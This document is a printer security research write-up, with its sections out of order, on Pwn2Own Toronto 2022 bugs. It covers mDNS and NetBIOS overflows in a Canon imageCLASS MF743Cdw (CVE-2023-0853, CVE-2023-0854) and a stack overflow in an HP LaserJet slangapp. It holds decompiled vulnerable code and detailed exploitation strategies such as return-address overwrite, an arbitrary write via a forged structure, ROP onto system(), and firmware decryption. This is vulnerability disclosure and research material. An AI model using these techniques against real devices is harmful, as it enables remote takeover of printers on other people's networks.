      *(_DWORD *)nsec = v51;
      if ...
      consume_label(cur_ptr, *ppayloadlen, _mdns_packet, v51, nsec_len);
      v52 = dwbyte;
      v53 = &cur_ptr[dwbyte];
      v54 = *ppayloadlen - dwbyte;
      *ppayloadlen = v54;
      v55 = (unsigned __int8)v53[1];
      v56 = (unsigned __int8)*v53;
      nsec_ = v53 + 2;
      *ppayloadlen = v54 - 2;
      v57 = v56 | (v55 << 8);
      nsec_len_ = __rev16(v57);
      if ...
      memcpy((int)nsec_buf, nsec_, nsec_len_, v57); //-------- [1]  stack overflow
      for ( i = 0; i < (int)nsec_len_; ++i )
      {
        if ( nsec_buf[i] )
        {
          for ( j = 0; j < 8; ++j )
          {
            if ( 1 << j == (unsigned __int8)nsec_buf[i] )
            {
              if ( v62 )
                v63 = 7 - j + 8 * i;
              else
                v62 = 7 - j + 8 * i;
            }
          }
        }
      }
      *(_WORD *)(nsec + 4) = v62;
      ...
    }
    *pinfo = &cur_ptr[-_mdns_packet - 0xC];
    *anwser_cnt -= v66;
    return 0;
  }
}

When it is parsing the NSEC(type 47) record, it does not check the length of the record. It will copy the data to a local buffer(nsec_buf[256]) at [1], which leads to a stack buffer overflow.
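The kind of check that is missing at [1] can be sketched as follows: the attacker-supplied length is validated against both the bytes remaining in the packet and the size of the destination before anything is copied. This is a minimal illustration under our own naming (copy_rdata_checked is hypothetical) and is not Canon's actual fix.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copy claimed_len bytes of record data into dst only if the length
 * fits both the remaining packet data and the destination buffer.
 * Returns the number of bytes copied, or -1 if the length is rejected. */
int copy_rdata_checked(unsigned char *dst, size_t dst_size,
                       const unsigned char *src, size_t claimed_len,
                       size_t remaining)
{
    assert(dst != NULL && src != NULL);
    if (claimed_len > remaining)
        return -1;   /* length field points past the end of the packet */
    if (claimed_len > dst_size)
        return -1;   /* would overflow the fixed-size buffer */
    memcpy(dst, src, claimed_len);
    return (int)claimed_len;
}
```

With a 256-byte destination such as nsec_buf, a 16-bit length field can claim up to 65535 bytes, so the second check is the one that matters for this bug.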

Exploitation

We can construct an mDNS packet to trigger the stack overflow. It does not have Stack Guard, so we can overwrite the return address directly. It also does not implement DEP. We can overwrite the return address with a global buffer which we can control to run our shellcode.

We finally chose BJNP session buffer as our target. It will copy our payload when we start a BJNP session.

We can run shellcode to do anything, such as modifying the website, changing the LCD screen, etc.

NetBIOS (CVE-2023-0854)

We found a heap overflow in the NetBIOS service. NetBIOS stands for Network Basic Input/Output System. It provides services related to the session layer of the OSI model, allowing applications on separate computers to communicate over a local area network. Canon implemented the NetBIOS daemon themselves.

It is enabled on Canon ImageCLASS MF743Cdw(Version 11.04) by default.

NetBIOS provides three distinct services:

  • Name service (NetBIOS-NS) for name registration and resolution.
  • Datagram distribution service (NetBIOS-DGM) for connectionless communication.
  • Session service (NetBIOS-SSN) for connection-oriented communication.

We will focus on NetBIOS-NS (port 137).

Before we look at the detail of the vulnerability we need to talk about NetBIOS-NS Packet Structure.

NetBIOS-NS is based on the DNS packet format. It is defined in RFC1002 for both queries and responses. NetBIOS queries and responses utilize the NS header format defined in RFC1002 with exceptions noted below:

                        1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         NAME_TRN_ID           | OPCODE  |   NM_FLAGS  | RCODE |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          QDCOUNT              |           ANCOUNT             |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          NSCOUNT              |           ARCOUNT             |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
(diagram from https://datatracker.ietf.org/doc/html/rfc1002)

The query is placed after the header. The first element is QNAME, a domain name represented as a sequence of labels, where each label consists of a length byte followed by that number of characters. The other elements are not important for this vulnerability, so we will not explain them here. More details can be found in RFC1002.

Where is the bug

When the Canon ImageCLASS MF743Cdw parses NetBIOS-NS packets, there is a heap overflow. The vulnerability is in the cmNetBiosParseName function, and we can trigger it from ndNameProcessExternalMessage.

When the NetBIOS service starts, it initializes netbios_ns_buffer by allocating 0xff bytes from the heap.

int ndNameInit()
{
  sub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndnampro.c", 0x44ED3194, 97, 0x64u);
  netbios_ns_buffer = calloc(1, 0xFF);
  ...
  return -1;
}

When parsing the NetBIOS-NS in NetBIOS packets, it will use ndNameProcessExternalMessage to process it.

int __fastcall ndNameProcessExternalMessage(Adapter *a1)
{
  netbios_header *packet; // r0
  unsigned __int8 *v3; // r6
  int flag; // r0
  int v5; // r5
  int v6; // r0
  int v8; // r4
  char nbname[40]; // [sp+8h] [bp-28h] BYREF

  sub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndnampro.c", 0x44ED31AC, 178, 0x64u);
  packet = (netbios_header *)a1->packet;
  LOWORD(a1->vvv) = LOBYTE(packet->id) | (HIBYTE(packet->id) << 8);
  v3 = cmNetBiosParseName(packet, (unsigned __int8 *)packet->payload, (int)nbname, netbios_ns_buffer, 0xFFu); //---- [1]
  // heap overflow at netbios_ns_buffer
  if ...
  flag = getname_query_flag((netbios_header *)a1->packet);
  v5 = flag;
  if ( flag == 0xA800 )
  {
    v6 = ndInternalNamePositiveRegistration(a1, (int)nbname, (int)v3);
    goto LABEL_17;
  }
  if ( flag > 0xA800 )
  {
    switch ( flag )
    {
      case 0xA801:
        v6 = ndInternalNameNegativeRegistration(a1, (int)nbname);
        goto LABEL_17;
      ...
    }
    goto LABEL_14;
  }
  ...
  ndInternalNameNegativeQuery((int)a1, (int)nbname);
  v6 = ndExternalNameNegativeQuery((int)a1, nbname);
LABEL_17:
  v8 = v6;
  assset("netcifsnqendapp/IMP/nq/ndnampro.c", 0x44ED31AC, 238, 100);
  return v8;
}

At [1], the function cmNetBiosParseName does not calculate the length of the domain name correctly. It copies the domain name to netbios_ns_buffer, which leads to a heap overflow.

Let’s take a look at cmNetBiosParseName function.

unsigned __int8 *__fastcall cmNetBiosParseName(netbios_header *netbios_packet, unsigned __int8 *netbios_label, int netbios_name, _BYTE *domain_name, unsigned int maxlen)
{
  char v5; // r9
  unsigned __int8 *v11; // r0
  _BYTE *v12; // r1
  unsigned int i; // r0
  char v15; // r3
  char v16; // r2
  int v17; // r0
  unsigned __int8 *v18; // r0
  unsigned int v19; // r3
  char *label_; // r0
  unsigned int labellen_; // r4
  unsigned int labellen; // t1
  char *v23; // r5
  unsigned __int8 *next[9]; // [sp+4h] [bp-24h] BYREF

  ...
  if ( *v11 == 0x20 )
  {
    ...
    v17 = *next[0];
    if ( *next[0] )
      v5 = '.';
    else
      *domain_name = 0;
    if ( v17 )
    {
      do
      {
        v18 = resolveLabel(netbios_packet, next);
        labellen = *v18;
        label_ = (char *)(v18 + 1);
        labellen_ = labellen;
        if ( maxlen > labellen )
        {
          memcpy((int)domain_name, label_, labellen_, v19);
          v23 = &domain_name[labellen_];
          maxlen -= labellen_; // ---------- [2]
          // it does not subtract the length of "."
          *v23 = v5;
          domain_name = v23 + 1;
        }
      }
      while ( *next[0] );
      *(domain_name - 1) = 0;
    }
    assset("netcifsnqecorelib/IMP/nq/cmnbname.c", 0x44A86D7C, 634, 100);
    return next[0] + 1;
  }
  else
  {
    logg("netcifsnqecorelib/IMP/nq/cmnbname.c", 0x44A86D7C, 595, 10);
    return 0;
  }
}

cmNetBiosParseName parses the domain name from the labels in the NetBIOS packet into the domain_name buffer. It checks each label’s length against the remaining maxlen and appends a "." after each label. However, at [2] it only subtracts the label length from maxlen and never subtracts the one byte used by each ".", so the total number of bytes written can exceed maxlen. This leads to the overflow.
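The accounting error is easier to see in a small model. The sketch below is not the firmware code; it is a simplified Python model of the copy loop at [2], and the function name parse_labels and the count_separator switch are our own names for illustration. It assumes every label is copied together with a trailing "." and that the last "." is replaced by a NUL, as in the decompiled loop.

```python
def parse_labels(labels, maxlen=0xFF, count_separator=False):
    """Model of the copy loop; returns the bytes written to domain_name.

    count_separator=False mirrors the decompiled logic (only the label
    length is subtracted). count_separator=True is one possible fix that
    also charges one byte for each "." (an assumption, not the vendor patch).
    """
    out = bytearray()
    for label in labels:
        if count_separator:
            fits = maxlen >= len(label) + 1
            cost = len(label) + 1
        else:
            fits = maxlen > len(label)
            cost = len(label)
        if fits:
            out += label + b"."   # label followed by the separator
            maxlen -= cost
    if out:
        out[-1] = 0               # the last "." becomes the terminator
    return bytes(out)


# One-byte labels cost 1 byte of budget each but write 2 bytes.
written = parse_labels([b"A"] * 300)
print(len(written))  # more than the 0xFF bytes allocated for the buffer
```

With one-byte labels, the model writes roughly twice the size of the 0xFF-byte buffer, which matches the idea that short labels maximize the overflow.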

Exploitation

Luckily, there is a useful structure located after netbios_ns_buffer on the heap, which we call nb_info. We can use the heap overflow to overwrite it.

The layout of heap memory:

The structure of nb_info and Adapter:

    struct nb_info
    {
      int active;
      char nbname[16];
      int x;
      int y;
      short z;
      short src_port;
      short tid;
      short w;
      Adapter *adapter;
      char *ptr;
      int state;
      ...
    }

This structure stores NetBIOS name information. It also has an Adapter member that stores the connection information.

    struct Adapter
    {
      int idx;
      _BYTE gap0[16];
      int x;
      int fd_1022;
      int fd_1023;
      int y;
      _WORD src_port;
      _DWORD src_ip;
      int vvv;
      int packet;
      _DWORD recv_bytes;
      char *response_buf;
      _DWORD dword3C;
    };

Let’s go back to ndNameProcessExternalMessage. If the flag of the NetBIOS-NS packet is set to 0xA801, it uses ndInternalNameNegativeRegistration to process our NetBIOS name. The result is written to Adapter->responsebuf.

    case 0xA801:
      v6 = ndInternalNameNegativeRegistration(a1, (int)nbname);
      goto LABEL_17;

In ndInternalNameNegativeRegistration:

    int __fastcall ndInternalNameNegativeRegistration(Adapter *adapter, int a2)
    {
      ...
      if ( v8 )
      {
        returnNegativeRegistrationResponse((nb_info *)v6, adapter, 3);
      }
      ...
    }

If the conditions are met, it calls returnNegativeRegistrationResponse to handle the response.

    int __fastcall returnNegativeRegistrationResponse(nb_info *nbinfo, Adapter *adapter, int a3)
    {
      int v6; // r2
      netbios_header *response_buf; // r5
      int NameWhateverResponse; // r2
      unsigned __int8 v10[20]; // [sp+4h] [bp-2Ch] BYREF
      __int16 v11; // [sp+18h] [bp-18h] BYREF
      int v12; // [sp+1Ah] [bp-16h] BYREF

      maybe_memcpy_s(v10, 0x44ED3100, 20);
      sub_41C47A20((int)"netcifsnqendapp/IMP/nq/ndinname.c", 0x44ED30DC, 2349, 0x64u);
      if ...
      v11 = 0;
      sub_40B06FD8(*(_DWORD *)adapter->gap0, &v12);
      response_buf = *(netbios_header **)nbinfo->adapter->responsebuf;
      NameWhateverResponse = ndGenerateNameWhateverResponse(response_buf, nbinfo->name, 0x20u, (char *)&v11, 6u);
      if ( NameWhateverResponse > 0 )
      {
        response_buf->id = nbinfo->id; //------[3]
        response_buf->flag = __rev16(a3 | 0xA800);
        if ( sySendToSocket(nbinfo->adapter->fd_1022, (const char *)response_buf, NameWhateverResponse, v10, (unsigned __int16)nbinfo->src_port) <= 0 )
        {
          logg("netcifsnqendapp/IMP/nq/ndinname.c", 0x44ED30DC, 2392, 10);
          v6 = 2393;
        }
        else
        {
          v6 = 2396;
        }
        goto LABEL_9;
      }
      assset("netcifsnqendapp/IMP/nq/ndinname.c", 0x44ED30DC, 2372, 100);
      return -1;
    }

At [3], it overwrites response_buf->id with nbinfo->id.

That is, if we can overwrite the nb_info structure and forge an Adapter structure, we get an arbitrary memory write. We need a global buffer in which to forge the structure, and we finally chose the BJNP session buffer as our target, because our payload is copied into it when we start a BJNP session.
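To make the pointer chain concrete, here is a minimal Python model of the write at [3]. It is only a sketch under several assumptions: memory is a flat bytearray, pointers are 32-bit little-endian offsets into it, the field offsets follow from the two struct listings above with natural alignment (response_buf at 0x38, just before dword3C), and nbinfo->id corresponds to the tid field. The real function also writes the rest of the generated response, which the model ignores.

```python
import struct

# Offsets derived from the struct listings above (assumed natural alignment).
NB_INFO_TID = 32            # short tid
NB_INFO_ADAPTER = 36        # Adapter *adapter
ADAPTER_RESPONSE_BUF = 0x38 # char *response_buf


def read_u32(mem, off):
    """Read a 32-bit little-endian value (assumed byte order)."""
    return struct.unpack_from("<I", mem, off)[0]


def negative_registration_write(mem, nbinfo_off):
    """Model of [3]: follow nb_info -> Adapter -> response_buf, write the id."""
    adapter = read_u32(mem, nbinfo_off + NB_INFO_ADAPTER)
    response_buf = read_u32(mem, adapter + ADAPTER_RESPONSE_BUF)
    mem[response_buf:response_buf + 2] = mem[nbinfo_off + NB_INFO_TID:
                                             nbinfo_off + NB_INFO_TID + 2]
    return response_buf


# Hypothetical layout: nb_info at 0x100 (reachable by the overflow),
# forged Adapter at 0x200 (standing in for the BJNP session buffer),
# and the address we want to overwrite at 0x300.
mem = bytearray(0x400)
struct.pack_into("<H", mem, 0x100 + NB_INFO_TID, 0x4241)          # value to write
struct.pack_into("<I", mem, 0x100 + NB_INFO_ADAPTER, 0x200)       # forged pointer
struct.pack_into("<I", mem, 0x200 + ADAPTER_RESPONSE_BUF, 0x300)  # write target
negative_registration_write(mem, 0x100)
```

In this model, controlling the adapter pointer and the two id bytes is enough to place a chosen 16-bit value at a chosen address, which is the primitive the paragraph above describes.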

Once we have an arbitrary memory write, we can overwrite the function pointer of the SLP service with a pointer to the BJNP session buffer.

    int __fastcall sub_4159CF90(unsigned __int8 *a1, unsigned int a2, int a3, int *a4)
    {
      ...
        result = ((int (__fastcall *)(int *, char *))dword_45C8FF14[2 * v20])(&v38, v47); // SLP function
        if ( !result )
          goto LABEL_46;
      }
      return result;
    }

The device does not implement DEP. After overwriting the function pointer, we use the BJNP session buffer again, this time to hold our shellcode. We then send an SLP attribute request to control the PC and run our shellcode.

HP

Our target this time is the HP Color LaserJet Pro M479fdw printer, which is Linux-based, making the analysis comparatively simple. Under the Web Service, there are numerous ‘cgi’ files providing various printer operations, all of which run as FastCGI services. You can refer to the nginx config to see which path corresponds to which port and service. The config can be found at rootfs/sirius/rom/httpmgr_nginx.

/Sirius/rom/httpmgr_nginx/ledm.conf


/usr/local/bin/slangapp is responsible for handling scan-related operations and listens on 127.0.0.1:14030.

We can see this in rootfs/sirius/rom/httpmgr_nginx/rest_scan.conf:

If we access /Scan/Jobs, the request is forwarded to a FastCGI service listening on port 14030. After analysis, we found that it is handled by /rootfs/usr/local/bin/slangapp. When we send a request to /Scan/Jobs, it calls scan_job_http_handler in slangapp.

Where is the bug

There is a stack overflow at rest_scan_handle_get_request in slangapp.

    int __fastcall scan_job_http_handler(int a1)
    {
      ...
      int request_method; // [sp+14h] [bp-2Ch]
      char *host; // [sp+18h] [bp-28h] BYREF
      int port; // [sp+20h] [bp-20h] BYREF
      char *uri; // [sp+28h] [bp-18h] BYREF
      int pathinfo; // [sp+30h] [bp-10h] BYREF
      int urilen[2]; // [sp+38h] [bp-8h] BYREF
      int pathinfo_len; // [sp+40h] [bp+0h] BYREF
      char s[132]; // [sp+44h] [bp+4h] BYREF
      char dest[260]; // [sp+C8h] [bp+88h] BYREF

      host = 0;
      memset(s, 0, 0x81u);
      port = -1;
      uri = 0;
      pathinfo = 0;
      urilen[0] = 0;
      pathinfo_len = 0;
      memset(byte_5DBD0, 0, 0x9C4u);
      v2 = ((int (__fastcall *)(struct httpmgr_fptrtbl **, int))(*rest_scan_req_ifc_tbl)->acceptRequestHelper)(rest_scan_req_ifc_tbl, a1);
      if ...
      if ( ((int (__fastcall *)(struct httpmgr_fptrtbl **, int, char **, int *, int *, int *, _DWORD, _DWORD))(*rest_scan_req_ifc_tbl)->getURI)(rest_scan_req_ifc_tbl, a1, &uri, urilen, &pathinfo, &pathinfo_len, 0, 0) < 0 )
        _DEBUG_syslog((int)"REST_SCAN_DEBUG", 0, 1193517589, 0, 0);
      if ...
      v17 = 1;
      if ...
    LABEL_7:
      request_method = ((int (__fastcall *)(struct httpmgr_fptrtbl **, int))(*rest_scan_req_ifc_tbl)->getVerb)(rest_scan_req_ifc_tbl, a1);
      if ...
      v3 = ((int (__fastcall *)(struct httpmgr_fptrtbl **, int))(*rest_scan_req_ifc_tbl)->getContentLength)(rest_scan_req_ifc_tbl, a1);
      v4 = v3;
      if ( (unsigned int)(v3 - 1) <= 0x9C2 )
      {
        v14 = v3;
        v15 = 0;
        do
        {
          if ( v14 >= 2500 )
            v14 = 2500;
          v16 = ((int (__fastcall *)(struct httpmgr_fptrtbl **, int, char *, int))(*rest_scan_req_ifc_tbl)->httpmgr_recvData)(rest_scan_req_ifc_tbl, v2, &byte_5DBD0[v15], v14);
          if ( v16 <= 0 )
            break;
          v15 += v16;
          v14 = v4 - v15;
        }
        while ( v4 - v15 > 0 );
        *((_BYTE *)&dword_5DBC8 + v4 + 8) = 0;
        if ( v15 < 0 )
        {
          v17 = 1;
          _DEBUG_syslog((int)"REST_SCAN_DEBUG", 0, 0x475DA215, v15, a1);
        }
      }
      else if ( v3 > 0x9C3 )
      {
        v5 = 0;
        do
        {
          while ( 2500 - v5 > 0 )
          {
            v6 = ((int (__fastcall *)(struct httpmgr_fptrtbl **))(*rest_scan_req_ifc_tbl)->httpmgr_recvData)(rest_scan_req_ifc_tbl);
            if ( v6 <= 0 )
              break;
            v5 += v6;
          }
          v7 = v5 <= 0;
          v5 = 0;
        }
        while ( !v7 );
      }
      v8 = ((int (__fastcall *)(struct httpmgr_fptrtbl **, int, char **, int *))(*rest_scan_req_ifc_tbl)->getHost)(rest_scan_req_ifc_tbl, a1, &host, &port);
      if ...
      v9 = ((int (__fastcall *)(struct httpmgr_fptrtbl **, int))(*rest_scan_req_ifc_tbl)->completeRequestHelper)(rest_scan_req_ifc_tbl, a1);
      if ( v9 > 0 )
      {
        do
        {
          v10 = 0;
          do
          {
            while ( 2500 - v10 > 0 )
            {
              v11 = ((int (__fastcall *)(struct httpmgr_fptrtbl **))(*rest_scan_req_ifc_tbl)->httpmgr_recvData)(rest_scan_req_ifc_tbl);
              if ( v11 <= 0 )
                break;
              v10 += v11;
            }
            v7 = v10 <= 0;
            v10 = 0;
          }
          while ( !v7 );
          v12 = ((int (__fastcall *)(struct httpmgr_fptrtbl **, int))(*rest_scan_req_ifc_tbl)->completeRequestHelper)(rest_scan_req_ifc_tbl, a1);
        }
        while ( v12 > 0 );
        v9 = v12;
      }
      ...
      result = (*(int (__fastcall **)(int))(*(_DWORD *)dword_65260 + 20))(dword_65260);
      dword_594F0 = result;
      switch ( request_method )
      {
        case 1:
          result = rest_scan_handle_get_request(a1, v4, uri, (unsigned __int8 *)pathinfo, pathinfo_len); // ----- [1]
          break;
        ...
        default:
          return result;
      }
      return result;
    }

If the request method is GET, it will use rest_scan_handle_get_request at [1] to handle it. It also passes the pathinfo to this function.

    int __fastcall rest_scan_handle_get_request(int a1, int a2, char *s1, unsigned __int8 *pathinfo, int pathinfo_len)
    {
      struct httpmgr_fptrtbl **v8; // r0
      int v9; // r1
      int v10; // r2
      struct httpmgr_fptrtbl **v11; // r0
      int v12; // r1
      int result; // r0
      int v14; // r0
      int next_char; // r4
      unsigned __int8 *v16; // r3
      int v17; // r1
      int v18; // t1
      char *v19; // r5
      int v20; // r5
      int v21; // r0
      int v22; // r7
      size_t v23; // r8
      int v24; // r0
      char first_path_info[32]; // [sp+8h] [bp-D8h] BYREF
      char second_path_info[32]; // [sp+28h] [bp-B8h] BYREF
      char pagenumber[152]; // [sp+48h] [bp-98h] BYREF

      if ...
      if ...
      if ( !strncmp(s1, "/Scan/UserReadyToScan", 0x15u) )
      {
        ...
      }
      else
      {
        v14 = strncmp(s1, "/Scan/Jobs", 0xAu);
        if ( v14 )
        {
          ...
        }
        ...
        next_char = *pathinfo;
        if ( (next_char & 0xDF) == 0 )
        {
          first_path_info[0] = 0;
    LABEL_37:
          _DEBUG_syslog("REST_SCAN_DEBUG", 0, 0x411FA215, 400, 0);
          v8 = rest_scan_req_ifc_tbl;
          v9 = a1;
          v10 = 400;
          goto LABEL_6;
        }
        v16 = pathinfo;
        v17 = 0;
        do //------------------------------------------------------ [2]
        {
          if ( next_char != '/' )
            first_path_info[32 * v17 + v14] = next_char;
          v19 = &first_path_info[32 * v17];
          if ( next_char == '/' )
          {
            v20 = 32 * v17++;
            pagenumber[v20 - 64 + v14] = 0;
            v19 = &first_path_info[v20 + 32];
            v14 = 0;
          }
          else
          {
            ++v14;
          }
          v18 = *++v16;
          next_char = v18;
        }
        while ( (v18 & 0xDF) != 0 );
        v19[v14] = 0;
        if ( v17 != 2 || strcmp(second_path_info, "Pages") || dword_5DBC8 != strtol(first_path_info, 0, 10) )
          goto LABEL_37;
        v24 = strtol(pagenumber, 0, 10);
        result = rest_scan_send_scan_data(a1, v24) + 1;
        if ( result )
          rest_scan_vp_thread_created = 1;
        else
          return rest_scan_send_err_reply(a1, 400);
      }
      return result;
    }

However, when it parses the pathinfo at [2], it does not check the length of the pathinfo or of any path segment. It copies the pathinfo byte by byte into the local buffer (first_path_info[32]), which leads to a stack overflow.
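The loop at [2] can be modelled in a few lines to see where the writes land. The sketch below is our own simplification, not the firmware code: it treats the three local buffers (32 + 32 + 152 bytes) as one contiguous region starting at first_path_info, and it only tracks the highest offset written. The names parse_pathinfo and FRAME_SIZE are hypothetical, and the exact form of the pathinfo string that reaches the function is an assumption.

```python
FRAME_SIZE = 32 + 32 + 152  # first_path_info + second_path_info + pagenumber


def parse_pathinfo(pathinfo: bytes):
    """Return (segments_seen, highest_offset_written) for the modelled loop.

    Offsets are relative to first_path_info. Each '/' starts a new 32-byte
    slot; no length check is made, exactly like the decompiled loop.
    """
    seg, pos, highest = 0, 0, -1
    for ch in pathinfo:
        if ch & 0xDF == 0:                 # NUL or space ends the path
            break
        highest = max(highest, 32 * seg + pos)  # character or segment NUL
        if ch == ord("/"):
            seg += 1
            pos = 0
        else:
            pos += 1
    highest = max(highest, 32 * seg + pos)      # final NUL terminator
    return seg, highest


# A well-formed path stays inside the buffers ...
print(parse_pathinfo(b"1/Pages/2"))
# ... while one long segment runs past the end of the locals.
segs, top = parse_pathinfo(b"A" * 300)
print(top >= FRAME_SIZE)
```

Any offset at or beyond FRAME_SIZE in this model falls outside the three local buffers, which is where saved registers and the return address would be expected on the real stack.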

Exploitation

We can send a long request to /Scan/Jobs/ to trigger it. The binary has no Stack Guard, so we can overwrite the return address directly. It does have DEP, however, so we need ROP to achieve our goal. We use ROP to overwrite the GOT entry of strncmp with system. After that, we can execute arbitrary commands by accessing /Copy/{cmd}.

However, in the end, this vulnerability collided with another team’s discovery.

Summary

Based on the results from Pwn2Own Austin 2021 to Pwn2Own Toronto 2022, printer security remains an easily overlooked issue. In just one year, the number of teams capable of compromising printers increased significantly. Even in the third year, at Pwn2Own Toronto 2023, many teams still found vulnerabilities. We recommend that everyone using these IoT devices turn off unnecessary services, set up firewalls properly, and enforce appropriate access controls to reduce the risk of attacks.


Your printer is not your printer ! - Hacking Printers at Pwn2Own Part II


English Version, Chinese Version

Hacking Printers at Pwn2Own Toronto 2022

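Continuing our earlier research, last year we also found pre-auth RCE vulnerabilities (CVE-2023-0853, CVE-2023-0854) in another Canon model, as well as a pre-auth RCE vulnerability in an HP printer, although the latter ultimately collided with another team’s finding. In this post, we describe the details of the Canon and HP vulnerabilities we used at Pwn2Own Toronto and how we exploited them.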

  • Pwn2Own Toronto 2022 Target

    Target                           Price     Master of Pwn Points
    HP Color LaserJet Pro M479fdw    $20000    2
    Lexmark MC3224i                  $20000    2
    Canon imageCLASS MF743Cdw        $20000    2

Analysis

Canon

Firmware Extract

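Same as in 2021; see the earlier part for details. The version this time is v11.04.

HP

The firmware itself can be obtained from HP’s firmware website. Unlike in 2021, however, it cannot be unpacked directly with binwalk. This firmware is AES-encrypted, and it is hard to decrypt from the information readily available.

Our initial idea was to look for an unencrypted firmware image in the same series, but none of the firmware on HP’s official site met that condition. We were originally planning to take the printer apart and find a way to dump the firmware, but while searching on Google we found an old mirror site with directory indexing enabled, from which we could obtain all the firmware on the mirror.

The problem was that the mirror only went up to 2016 and had no information on the latest versions. However, from the information on the site we later worked out the official directory structure, and from there obtained unencrypted firmware from the same series.

After analysis, we found decryption-related information in fwupd in the firmware. By reversing it, we learned the encryption method and key, and then decrypted the firmware of the target version.

HP Color LaserJet Pro M479fdw

  • OS - Linux-based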
  • ARMv7 32bit little-endian

Vulnerability & Exploitation

Canon

mDNS (CVE-2023-0853)

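The mDNS protocol provides name resolution on the local network without requiring a name server, and is commonly used by Apple and IoT devices.

Canon printers also provide this feature by default, making it easy for users to find printers on the local network.

The protocol is based on DNS, and mDNS largely builds on the DNS packet format (RFC1035), which is shown below: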

The packet format:

    +---------------------+
    |        Header       |
    +---------------------+
    |       Question      | the question for the name server
    +---------------------+
    |        Answer       | RRs answering the question
    +---------------------+
    |      Authority      | RRs pointing toward an authority
    +---------------------+
    |      Additional     | RRs holding additional information
    +---------------------+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)

The header contains the following fields:

                                    1  1  1  1  1  1
      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      ID                       |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |QR|   Opcode  |AA|TC|RD|RA|   Z    |   RCODE   |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    QDCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    ANCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    NSCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                    ARCOUNT                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)

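A packet can be divided into a header and a body. The actual requests are placed in the body, and the last three sections share the same format. The Answer section holds the resource records (RRs) that answer the Question.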

Resource record format:

                                    1  1  1  1  1  1
      0  1  2  3  4  5  6  7  8  9  0  1  2  3  4  5
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                                               |
    /                                               /
    /                      NAME                     /
    |                                               |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      TYPE                     |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                     CLASS                     |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                      TTL                      |
    |                                               |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
    |                   RDLENGTH                    |
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|
    /                     RDATA                     /
    /                                               /
    +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
(diagram from https://www.ietf.org/rfc/rfc1035.txt)

The RDATA part differs depending on the type. When type=NSEC, its format is as follows:

   The RDATA of the NSEC RR is as shown below:

                        1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 3 3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   /                      Next Domain Name                         /
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   /                       Type Bit Maps                           /
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
(diagram from https://www.ietf.org/rfc/rfc4034.txt)

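The remaining parts are not important for this vulnerability, so we will not explain them in detail. More details can be found in RFC 6762, RFC 1035, and RFC 4034.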
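For readers who prefer code to diagrams, the header and resource record layouts from RFC 1035 can be sketched with Python's struct module. This is only an illustration of the wire format; the helper names dns_header, encode_name, and resource_record are ours, and name compression is deliberately left out.

```python
import struct


def dns_header(ident, flags, qdcount=0, ancount=0, nscount=0, arcount=0):
    """Pack the 12-byte header: six 16-bit fields in network byte order."""
    return struct.pack("!6H", ident, flags, qdcount, ancount, nscount, arcount)


def encode_name(name: str) -> bytes:
    """Encode a dotted name as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) <= 63:
            raise ValueError("each label must be 1..63 bytes")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def resource_record(name, rtype, rclass, ttl, rdata: bytes) -> bytes:
    """NAME, then TYPE, CLASS, TTL, RDLENGTH, followed by RDATA."""
    fixed = struct.pack("!HHIH", rtype, rclass, ttl, len(rdata))
    return encode_name(name) + fixed + rdata


# Example: a response header announcing one answer, plus an A record.
header = dns_header(0, 0x8400, ancount=1)
answer = resource_record("printer.local", 1, 1, 120, bytes([192, 168, 0, 10]))
packet = header + answer
```

The name printer.local and the address are placeholder values. An NSEC record would use the same resource_record framing with type 47 and the RDATA layout shown in the RFC 4034 diagram above.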

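Where is the bug

When the Canon imageCLASS MF743Cdw processes the Answer section (type=NSEC), it does not check the length, which leads to a stack overflow.

The bnMdnsParseAnswers function is mainly responsible for processing the answer section of the packet.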

    int __fastcall bnMdnsParseAnswers(netbios_header *mdns_packet, unsigned int *ppayloadlen, netbios_header *pmdns_header, _WORD *anwser_rr, rrlist **payload, _DWORD *pinfo)
